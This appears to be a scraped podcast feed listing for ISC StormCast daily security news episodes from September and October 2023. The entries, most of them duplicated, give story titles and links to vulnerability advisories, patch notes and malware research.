CVE-2023-22515 Activately Exploited https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html curl SOCKS5 oversized hostname vulnerability CVe-2023-38545 https://isc.sans.edu/diary/CVE-2023-38545%3A%20curl%20SOCKS5%20oversized%20hostname%20vulnerability.%20How%20bad%20is%20it%3F/30304 Adobe Acrobat Vulnerablity Actively Exploited CVE-2023-21608 https://www.cisa.gov/news-events/alerts/2023/10/10/cisa-adds-five-known-vulnerabilities-catalog Google Makes Passkey the Default https://blog.google/technology/safety-security/passkeys-default-google-accounts/ VBScript Deprecated from Windows https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features
10/12/20235 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, October 11th, 2023

http2 rapid reset https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/ microsoft patch tuesday https://isc.sans.edu/diary/October%202023%20Microsoft%20Patch%20Tuesday%20Summary/30300
10/11/20237 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, October 11th, 2023

http2 rapid reset https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/ microsoft patch tuesday https://isc.sans.edu/diary/October%202023%20Microsoft%20Patch%20Tuesday%20Summary/30300
10/11/20237 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, October 10th, 2023

ZIP's DOSTIME and DOSDATE Formats https://isc.sans.edu/diary/ZIP%27s%20DOSTIME%20%26%20DOSDATE%20Formats/30296 New Magecart Campaign Abusing 404 Pages https://www.akamai.com/blog/security-research/magecart-new-technique-404-pages-skimmer Sophos Effected by Exim Flaw https://www.sophos.com/en-us/security-advisories/sophos-sa-20231005-exim-vuln Turn OFF This WatchGuard Feature: GuardLapse https://projectblack.io/blog/turn-off-this-watchguard-feature-guardlapse/
10/10/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, October 10th, 2023

ZIP's DOSTIME and DOSDATE Formats https://isc.sans.edu/diary/ZIP%27s%20DOSTIME%20%26%20DOSDATE%20Formats/30296 New Magecart Campaign Abusing 404 Pages https://www.akamai.com/blog/security-research/magecart-new-technique-404-pages-skimmer Sophos Effected by Exim Flaw https://www.sophos.com/en-us/security-advisories/sophos-sa-20231005-exim-vuln Turn OFF This WatchGuard Feature: GuardLapse https://projectblack.io/blog/turn-off-this-watchguard-feature-guardlapse/
10/10/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, October 9th, 2023

Binary IPv6 Address Conversion https://isc.sans.edu/diary/Binary%20IPv6%20Addresses/30290 Wireshark Updates https://www.wireshark.org/ Improved GitHub Secret Scanning https://github.blog/2023-10-04-introducing-secret-scanning-validity-checks-for-major-cloud-services/ Prerooted Android Devices https://arstechnica.com/security/2023/10/thousands-of-android-devices-come-with-unkillable-backdoor-preinstalled/ curl update https://github.com/curl/curl/discussions/12026
10/9/20236 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, October 9th, 2023

Binary IPv6 Address Conversion https://isc.sans.edu/diary/Binary%20IPv6%20Addresses/30290 Wireshark Updates https://www.wireshark.org/ Improved GitHub Secret Scanning https://github.blog/2023-10-04-introducing-secret-scanning-validity-checks-for-major-cloud-services/ Prerooted Android Devices https://arstechnica.com/security/2023/10/thousands-of-android-devices-come-with-unkillable-backdoor-preinstalled/ curl update https://github.com/curl/curl/discussions/12026
10/9/20236 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, October 6th, 2023

New tool: le-hex-to-ip.py https://isc.sans.edu/diary/New%20tool%3A%20le-hex-to-ip.py/30284 Cisco Emergency Responder Static Credentials Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cer-priv-esc-B9t3hqk9 Loony Tunables PoC CVE-2023-4911 https://haxx.in/files/gnu-acme.py Malicious Python Packages https://checkmarx.com/blog/the-evolutionary-tale-of-a-persistent-python-threat/ Supermicro BMC Vulnerability https://binarly.io/posts/Binarly_REsearch_Uncovers_Major_Vulnerabilities_in_Supermicro_BMCs/index.html
10/6/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, October 6th, 2023

New tool: le-hex-to-ip.py https://isc.sans.edu/diary/New%20tool%3A%20le-hex-to-ip.py/30284 Cisco Emergency Responder Static Credentials Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cer-priv-esc-B9t3hqk9 Loony Tunables PoC CVE-2023-4911 https://haxx.in/files/gnu-acme.py Malicious Python Packages https://checkmarx.com/blog/the-evolutionary-tale-of-a-persistent-python-threat/ Supermicro BMC Vulnerability https://binarly.io/posts/Binarly_REsearch_Uncovers_Major_Vulnerabilities_in_Supermicro_BMCs/index.html
10/6/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, October 5th, 2023

Normal Connections https://isc.sans.edu/diary/Whats+Normal+Connection+Sizes/30278/ Apple Patches https://isc.sans.edu/diary/Apple%20fixes%20vulnerabilities%20in%20iOS%20and%20iPadOS./30280 Looney Tunables Linux Privilege Escalation https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so Atlasian Confluence Server Vulnerability https://jira.atlassian.com/browse/CONFSERVER-92475
10/5/20235 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, October 5th, 2023

Normal Connections https://isc.sans.edu/diary/Whats+Normal+Connection+Sizes/30278/ Apple Patches https://isc.sans.edu/diary/Apple%20fixes%20vulnerabilities%20in%20iOS%20and%20iPadOS./30280 Looney Tunables Linux Privilege Escalation https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so Atlasian Confluence Server Vulnerability https://jira.atlassian.com/browse/CONFSERVER-92475
10/5/20235 minutes, 30 seconds
Episode Artwork

ISC StormCast for Wednesday, October 4th, 2023

Are Local LLMs Useful in Incident Response? https://isc.sans.edu/diary/Are%20Local%20LLMs%20Useful%20in%20Incident%20Response%3F/30274 Pytorch Vulnerability https://github.com/advisories/GHSA-4mqg-h5jf-j9m7 BING Reads Captchas https://twitter.com/literallydenis/status/1708283962399846459 Evilproxy vs. Microsoft 365 https://www.menlosecurity.com/blog/evilproxy-phishing-attack-strikes-indeed/
10/4/20235 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, October 4th, 2023

Are Local LLMs Useful in Incident Response? https://isc.sans.edu/diary/Are%20Local%20LLMs%20Useful%20in%20Incident%20Response%3F/30274 Pytorch Vulnerability https://github.com/advisories/GHSA-4mqg-h5jf-j9m7 BING Reads Captchas https://twitter.com/literallydenis/status/1708283962399846459 Evilproxy vs. Microsoft 365 https://www.menlosecurity.com/blog/evilproxy-phishing-attack-strikes-indeed/
10/4/20235 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, October 3rd, 2023

Friendly Reminder: ZIP Metadata is Not Encrypted https://isc.sans.edu/diary/Friendly%20Reminder%3A%20ZIP%20Metadata%20is%20Not%20Encrypted/30268 EXIM New Version Released https://www.exim.org/static/doc/security/CVE-2023-zdi.txt Mail GPU Kernel Driver Allows Improper GPU Memory Processing Operations https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities Bing AI Serves Malicous Ads https://www.malwarebytes.com/blog/threat-intelligence/2023/09/malicious-ad-served-inside-bing-ai-chatbot Google Announces Robots.txt Ad-Restrictions https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers#adsbot-mobile-web-android
10/3/20235 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, October 3rd, 2023

Friendly Reminder: ZIP Metadata is Not Encrypted https://isc.sans.edu/diary/Friendly%20Reminder%3A%20ZIP%20Metadata%20is%20Not%20Encrypted/30268 EXIM New Version Released https://www.exim.org/static/doc/security/CVE-2023-zdi.txt Mail GPU Kernel Driver Allows Improper GPU Memory Processing Operations https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities Bing AI Serves Malicous Ads https://www.malwarebytes.com/blog/threat-intelligence/2023/09/malicious-ad-served-inside-bing-ai-chatbot Google Announces Robots.txt Ad-Restrictions https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers#adsbot-mobile-web-android
10/3/20235 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, October 2nd, 2023

Analyzing MIME Files: a Quick Tip https://isc.sans.edu/diary/Analyzing%20MIME%20Files%3A%20a%20Quick%20Tip/30266 Infostealers Looking for Password Files https://isc.sans.edu/diary/Are+You+Still+Storing+Passwords+In+Plain+Text+Files/30262/ Simple Netcat Backdoor https://isc.sans.edu/diary/Simple+Netcat+Backdoor+in+Python+Script/30264/ EXIM Response to the ZDI Release https://exim.org/static/doc/security/CVE-2023-zdi.txt Exploit for WS_FTP Vulnerability https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044
10/2/20235 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, October 2nd, 2023

Analyzing MIME Files: a Quick Tip https://isc.sans.edu/diary/Analyzing%20MIME%20Files%3A%20a%20Quick%20Tip/30266 Infostealers Looking for Password Files https://isc.sans.edu/diary/Are+You+Still+Storing+Passwords+In+Plain+Text+Files/30262/ Simple Netcat Backdoor https://isc.sans.edu/diary/Simple+Netcat+Backdoor+in+Python+Script/30264/ EXIM Response to the ZDI Release https://exim.org/static/doc/security/CVE-2023-zdi.txt Exploit for WS_FTP Vulnerability https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044
10/2/20235 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, September 29th, 2023

IPv4 Addresses in Little Endian Decimal Format https://isc.sans.edu/diary/IPv4%20Addresses%20in%20Little%20Endian%20Decimal%20Format/30256 Chrome Update fixes 0-day Vulnerability https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop_27.html Unpatched EXIM Vulnerabilities https://www.zerodayinitiative.com/advisories/ZDI-23-1469/ WS_FTP Vulnerabilities https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023
9/29/20234 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, September 29th, 2023

IPv4 Addresses in Little Endian Decimal Format https://isc.sans.edu/diary/IPv4%20Addresses%20in%20Little%20Endian%20Decimal%20Format/30256 Chrome Update fixes 0-day Vulnerability https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop_27.html Unpatched EXIM Vulnerabilities https://www.zerodayinitiative.com/advisories/ZDI-23-1469/ WS_FTP Vulnerabilities https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023
9/29/20234 minutes, 46 seconds
Episode Artwork

ISC StormCast for Thursday, September 28th, 2023

GPU Sidechannel Attack https://www.hertzbleed.com/gpu.zip/GPU-zip.pdf Router Firmware Compromised for Persistent Access https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-csa-cyber-report-sept-2023 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-270a More libwebp vulnerability confusion https://www.cve.org/CVERecord?id=CVE-2023-5129 https://arstechnica.com/security/2023/09/google-quietly-corrects-previously-submitted-disclosure-for-critical-webp-0-day/ Fake Dependabot Commits https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/
9/28/20236 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, September 28th, 2023

GPU Sidechannel Attack https://www.hertzbleed.com/gpu.zip/GPU-zip.pdf Router Firmware Compromised for Persistent Access https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-csa-cyber-report-sept-2023 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-270a More libwebp vulnerability confusion https://www.cve.org/CVERecord?id=CVE-2023-5129 https://arstechnica.com/security/2023/09/google-quietly-corrects-previously-submitted-disclosure-for-critical-webp-0-day/ Fake Dependabot Commits https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/
9/28/20236 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, September 27th, 2023

A new spint on the ZeroFont phishing technique https://isc.sans.edu/diary/A%20new%20spin%20on%20the%20ZeroFont%20phishing%20technique/30248 macOS Sonoma Updates https://isc.sans.edu/diary/Apple%20Releases%20MacOS%20Sonoma%20Including%20Numerous%20Security%20Patches/30252
9/27/20236 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, September 27th, 2023

A new spint on the ZeroFont phishing technique https://isc.sans.edu/diary/A%20new%20spin%20on%20the%20ZeroFont%20phishing%20technique/30248 macOS Sonoma Updates https://isc.sans.edu/diary/Apple%20Releases%20MacOS%20Sonoma%20Including%20Numerous%20Security%20Patches/30252
9/27/20236 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, September 26th, 2023

LuaJIT Malware https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/ NPM systeminformation flaw https://systeminformation.io/security.html Team City Authentication Bypass https://twitter.com/ptswarm/status/1706223917008834748
9/26/20235 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, September 26th, 2023

LuaJIT Malware https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/ NPM systeminformation flaw https://systeminformation.io/security.html Team City Authentication Bypass https://twitter.com/ptswarm/status/1706223917008834748
9/26/20235 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, September 25th, 2023

Scanning for Laravel - a PHP Framework for Web Artisants https://isc.sans.edu/forums/diary/Scanning%20for%20Laravel%20-%20a%20PHP%20Framework%20for%20Web%20Artisants/30242/ Fake CVE-2023-40477 Proof of Concept Leads to VenomRAT https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/ Unmasking a Sophistiacted Phishing Campaign That Targets Hotel Guests https://www.akamai.com/blog/security-research/sophisticated-phishing-campaign-targeting-hospitality BSides JAX October 14th https://www.bsidesjax.org/ tickets: https://www.eventbrite.com/e/bsides-jacksonville-2023-registration-566463807497?aff=oddtdtcreator
9/25/20237 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, September 25th, 2023

Scanning for Laravel - a PHP Framework for Web Artisants https://isc.sans.edu/forums/diary/Scanning%20for%20Laravel%20-%20a%20PHP%20Framework%20for%20Web%20Artisants/30242/ Fake CVE-2023-40477 Proof of Concept Leads to VenomRAT https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/ Unmasking a Sophistiacted Phishing Campaign That Targets Hotel Guests https://www.akamai.com/blog/security-research/sophisticated-phishing-campaign-targeting-hospitality BSides JAX October 14th https://www.bsidesjax.org/ tickets: https://www.eventbrite.com/e/bsides-jacksonville-2023-registration-566463807497?aff=oddtdtcreator
9/25/20237 minutes, 8 seconds
Episode Artwork

ISC StormCast for Friday, September 22nd, 2023

Apple Patches Three 0-Days https://isc.sans.edu/diary/Apple+Patches+Three+New+0Day+Vulnerabilities+Affecting+iOSiPadOSwatchOSmacOS/30238 WebP Vulnerability https://blog.isosceles.com/the-webp-0day/ MOVEit Transfer Service Pack https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-September-2023 Improved Passkey Support in Windows 11 https://www.microsoft.com/en-us/security/blog/2023/09/21/new-microsoft-security-tools-to-protect-families-and-businesses/
9/22/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, September 22nd, 2023

Apple Patches Three 0-Days https://isc.sans.edu/diary/Apple+Patches+Three+New+0Day+Vulnerabilities+Affecting+iOSiPadOSwatchOSmacOS/30238 WebP Vulnerability https://blog.isosceles.com/the-webp-0day/ MOVEit Transfer Service Pack https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-September-2023 Improved Passkey Support in Windows 11 https://www.microsoft.com/en-us/security/blog/2023/09/21/new-microsoft-security-tools-to-protect-families-and-businesses/
9/22/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, September 21st, 2023

What's Normal: DNS TTL Values https://isc.sans.edu/forums/diary/What's%20Normal%3F%20DNS%20TTL%20Values/30234/ CISA Highlights Snatch Ransomware https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-263a npm packages caught exfiltrating Kubernetes config, SSH keys https://blog.sonatype.com/npm-packages-caught-exfiltrating-kubernetes-config-ssh-keys Nagios XI Vulnerabilities https://outpost24.com/blog/nagios-xi-vulnerabilities/
9/21/20235 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, September 21st, 2023

What's Normal: DNS TTL Values https://isc.sans.edu/forums/diary/What's%20Normal%3F%20DNS%20TTL%20Values/30234/ CISA Highlights Snatch Ransomware https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-263a npm packages caught exfiltrating Kubernetes config, SSH keys https://blog.sonatype.com/npm-packages-caught-exfiltrating-kubernetes-config-ssh-keys Nagios XI Vulnerabilities https://outpost24.com/blog/nagios-xi-vulnerabilities/
9/21/20235 minutes, 58 seconds
Episode Artwork

ISC StormCast for Wednesday, September 20th, 2023

Obfuscated Scans For Older Adobe Experience Manager Vulnerabilities https://isc.sans.edu/diary/Obfuscated%20Scans%20for%20Older%20Adobe%20Experience%20Manager%20Vulnerabilities/30230 Trend Micro Apex One 0-day https://success.trendmicro.com/dcx/s/solution/000294994?language=en_US SprySOCKS Backdoor https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html GitLab Patches https://about.gitlab.com/releases/2023/09/18/security-release-gitlab-16-3-4-released/
9/20/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, September 20th, 2023

Obfuscated Scans For Older Adobe Experience Manager Vulnerabilities https://isc.sans.edu/diary/Obfuscated%20Scans%20for%20Older%20Adobe%20Experience%20Manager%20Vulnerabilities/30230 Trend Micro Apex One 0-day https://success.trendmicro.com/dcx/s/solution/000294994?language=en_US SprySOCKS Backdoor https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html GitLab Patches https://about.gitlab.com/releases/2023/09/18/security-release-gitlab-16-3-4-released/
9/20/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, September 19th, 2023

Internet Wide Multi VPN Search from Single /24 Network https://isc.sans.edu/diary/Internet%20Wide%20Multi%20VPN%20Search%20From%20Single%20%2024%20Network/30226 iOS/iPadOS/tvOS/WatchOS Updates https://support.apple.com/en-us/HT201222 Juniper Vuln Details/Exploit CVE-2023-36845 https://vulncheck.com/blog/juniper-cve-2023-36845
9/19/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, September 19th, 2023

Internet Wide Multi VPN Search from Single /24 Network https://isc.sans.edu/diary/Internet%20Wide%20Multi%20VPN%20Search%20From%20Single%20%2024%20Network/30226 iOS/iPadOS/tvOS/WatchOS Updates https://support.apple.com/en-us/HT201222 Juniper Vuln Details/Exploit CVE-2023-36845 https://vulncheck.com/blog/juniper-cve-2023-36845
9/19/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, September 18th, 2023

When MFA isn't actually MFA https://retool.com/blog/mfa-isnt-mfa/ QNAP Patches https://www.qnap.com/en/security-advisories?ref=security_advisory_details Chrome able to use Apple Keychain Passkeys https://9to5google.com/2023/09/14/chrome-118-icloud-passkey/ Fortinet XSS https://fortiguard.fortinet.com/psirt/FG-IR-23-106 vBulletin XSS https://gist.github.com/GiongfNef/8fe658dce4c7fcf3a7b4e6387e50141c
9/18/20235 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, September 18th, 2023

When MFA isn't actually MFA https://retool.com/blog/mfa-isnt-mfa/ QNAP Patches https://www.qnap.com/en/security-advisories?ref=security_advisory_details Chrome able to use Apple Keychain Passkeys https://9to5google.com/2023/09/14/chrome-118-icloud-passkey/ Fortinet XSS https://fortiguard.fortinet.com/psirt/FG-IR-23-106 vBulletin XSS https://gist.github.com/GiongfNef/8fe658dce4c7fcf3a7b4e6387e50141c
9/18/20235 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, September 15th, 2023

DShield and eqmu Sitting in a Tree: L-O-G-G-I-N-G https://isc.sans.edu/diary/DShield%20and%20qemu%20Sitting%20in%20a%20Tree%3A%20L-O-G-G-I-N-G/30216 Uncursing the ncurses memory corruption vulnerabilities https://www.microsoft.com/en-us/security/blog/2023/09/14/uncursing-the-ncurses-memory-corruption-vulnerabilities-found-in-library/ Arbitrary code execution via Windows Themes (CVE-2023-38146) https://exploits.forsale/themebleed/ 3AM Ransomware used if LockBit Fails https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
9/15/20235 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, September 15th, 2023

DShield and eqmu Sitting in a Tree: L-O-G-G-I-N-G https://isc.sans.edu/diary/DShield%20and%20qemu%20Sitting%20in%20a%20Tree%3A%20L-O-G-G-I-N-G/30216 Uncursing the ncurses memory corruption vulnerabilities https://www.microsoft.com/en-us/security/blog/2023/09/14/uncursing-the-ncurses-memory-corruption-vulnerabilities-found-in-library/ Arbitrary code execution via Windows Themes (CVE-2023-38146) https://exploits.forsale/themebleed/ 3AM Ransomware used if LockBit Fails https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
9/15/20235 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, September 14th, 2023

Backdoored Free DownloadManager https://securelist.com/backdoored-free-download-manager-linux-malware/110465/ Foxit PDF Reader Updates https://www.foxit.com/support/security-bulletins.html macOS MetaStealer: New Family of Obfuscated Go Infostealers https://www.sentinelone.com/blog/macos-metastealer-new-family-of-obfuscated-go-infostealers-spread-in-targeted-attacks/ Windows 11 to Support Blocking SMB NTLM Hashes https://techcommunity.microsoft.com/t5/storage-at-microsoft/smb-ntlm-blocking-now-supported-in-windows-insider/ba-p/3916206
9/14/20235 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, September 14th, 2023

Backdoored Free DownloadManager https://securelist.com/backdoored-free-download-manager-linux-malware/110465/ Foxit PDF Reader Updates https://www.foxit.com/support/security-bulletins.html macOS MetaStealer: New Family of Obfuscated Go Infostealers https://www.sentinelone.com/blog/macos-metastealer-new-family-of-obfuscated-go-infostealers-spread-in-targeted-attacks/ Windows 11 to Support Blocking SMB NTLM Hashes https://techcommunity.microsoft.com/t5/storage-at-microsoft/smb-ntlm-blocking-now-supported-in-windows-insider/ba-p/3916206
9/14/20235 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, September 13th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20September%202023%20Patch%20Tuesday/30214 OpenSSL 1.1.1 End of Life https://www.openssl.org/blog/blog/2023/09/11/eol-111/ Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
9/13/20235 minutes, 58 seconds
Episode Artwork

ISC StormCast for Wednesday, September 13th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20September%202023%20Patch%20Tuesday/30214 OpenSSL 1.1.1 End of Life https://www.openssl.org/blog/blog/2023/09/11/eol-111/ Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
9/13/20235 minutes, 58 seconds
Episode Artwork

ISC StormCast for Tuesday, September 12th, 2023

Apple Patches Older Operating Systems https://isc.sans.edu/diary/Apple%20fixes%200-Day%20Vulnerability%20in%20Older%20Operating%20Systems/30210 Wi-Fi Enabled Practical Keystroke Eavesdropping https://arxiv.org/pdf/2309.03492.pdf Phishing via Google Looker Studio https://blog.checkpoint.com/security/phishing-via-google-looker-studio HPE One View Authentication Bypass https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04530en_us
9/12/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Tuesday, September 12th, 2023

Apple Patches Older Operating Systems https://isc.sans.edu/diary/Apple%20fixes%200-Day%20Vulnerability%20in%20Older%20Operating%20Systems/30210 Wi-Fi Enabled Practical Keystroke Eavesdropping https://arxiv.org/pdf/2309.03492.pdf Phishing via Google Looker Studio https://blog.checkpoint.com/security/phishing-via-google-looker-studio HPE One View Authentication Bypass https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04530en_us
9/12/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, September 11th, 2023

Augmenting Honeypot Logs https://isc.sans.edu/diary/%3FAnyone%20get%20the%20ASN%20of%20the%20Truck%20that%20Hit%20Me%3F!%3F%3A%20Creating%20a%20PowerShell%20Function%20to%20Make%203rd%20Party%20API%20Calls%20for%20Extending%20Honeypot%20Information%20%5BGuest%20Diary%5D/30204 More details about Apple 0-day https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/ Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Remote Access VPN Unauthorized Access Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ravpn-auth-8LyfCkeC#fs Odd Password Solution https://notpickard.com/@rdp/111009868239846779
9/11/20236 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, September 11th, 2023

Augmenting Honeypot Logs https://isc.sans.edu/diary/%3FAnyone%20get%20the%20ASN%20of%20the%20Truck%20that%20Hit%20Me%3F!%3F%3A%20Creating%20a%20PowerShell%20Function%20to%20Make%203rd%20Party%20API%20Calls%20for%20Extending%20Honeypot%20Information%20%5BGuest%20Diary%5D/30204 More details about Apple 0-day https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/ Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Remote Access VPN Unauthorized Access Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ravpn-auth-8LyfCkeC#fs Odd Password Solution https://notpickard.com/@rdp/111009868239846779
9/11/20236 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, September 8th, 2023

Apple Patches 0-Days https://isc.sans.edu/diary/30200 https://support.apple.com/en-us/HT201222 iOS Fleezeware/Scareware https://isc.sans.edu/diary/Fleezeware%20Scareware%20Advertised%20via%20Facebook%20Tags%3B%20Available%20in%20Apple%20App%20Store/30198 Aruba Vulnerabilities https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-014.txt TP Link Vulnerabilities https://jvn.jp/en/vu/JVNVU99392903/
9/8/20235 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, September 8th, 2023

Apple Patches 0-Days https://isc.sans.edu/diary/30200 https://support.apple.com/en-us/HT201222 iOS Fleezeware/Scareware https://isc.sans.edu/diary/Fleezeware%20Scareware%20Advertised%20via%20Facebook%20Tags%3B%20Available%20in%20Apple%20App%20Store/30198 Aruba Vulnerabilities https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-014.txt TP Link Vulnerabilities https://jvn.jp/en/vu/JVNVU99392903/
9/8/20235 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, September 7th, 2023

Security Related DNS Records https://isc.sans.edu/diary/Security%20Relevant%20DNS%20Records/30194 Microsoft Reveleas Details about Key Loss https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/ September Android Updates https://source.android.com/docs/security/bulletin/2023-09-01 Google Chrome Update https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop.html Atlas VPN Tunnel Termination Vulnerability https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/
9/7/20235 minutes, 43 seconds
Episode Artwork

ISC StormCast for Thursday, September 7th, 2023

Security Related DNS Records https://isc.sans.edu/diary/Security%20Relevant%20DNS%20Records/30194 Microsoft Reveleas Details about Key Loss https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/ September Android Updates https://source.android.com/docs/security/bulletin/2023-09-01 Google Chrome Update https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop.html Atlas VPN Tunnel Termination Vulnerability https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/
9/7/20235 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, September 6th, 2023

Common Usernames Submitted to Honeypots https://isc.sans.edu/diary/Common%20usernames%20submitted%20to%20honeypots/30188 TPM LUKS Bypass https://pulsesecurity.co.nz/advisories/tpm-luks-bypass Cross Tenant Impersonation Prevention and Detection https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
9/6/20235 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, September 6th, 2023

Common Usernames Submitted to Honeypots https://isc.sans.edu/diary/Common%20usernames%20submitted%20to%20honeypots/30188 TPM LUKS Bypass https://pulsesecurity.co.nz/advisories/tpm-luks-bypass Cross Tenant Impersonation Prevention and Detection https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
9/6/20235 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, September 5th, 2023

What is the Origin of Passwords Submitted to Honeypots https://isc.sans.edu/diary/What%20is%20the%20origin%20of%20passwords%20submitted%20to%20honeypots%3F/30182 Creating a YARA Rule to Detect Obfuscated Strings https://isc.sans.edu/diary/Creating%20a%20YARA%20Rule%20to%20Detect%20Obfuscated%20Strings/30186 VMware Aria Operations for Networks Hardcoded Keys 2023-34039 https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/ https://github.com/sinsinology/CVE-2023-34039/ Windows will Disable TLS 1.0/1.1 https://learn.microsoft.com/en-us/windows/release-health/windows-message-center
9/5/20236 minutes, 17 seconds
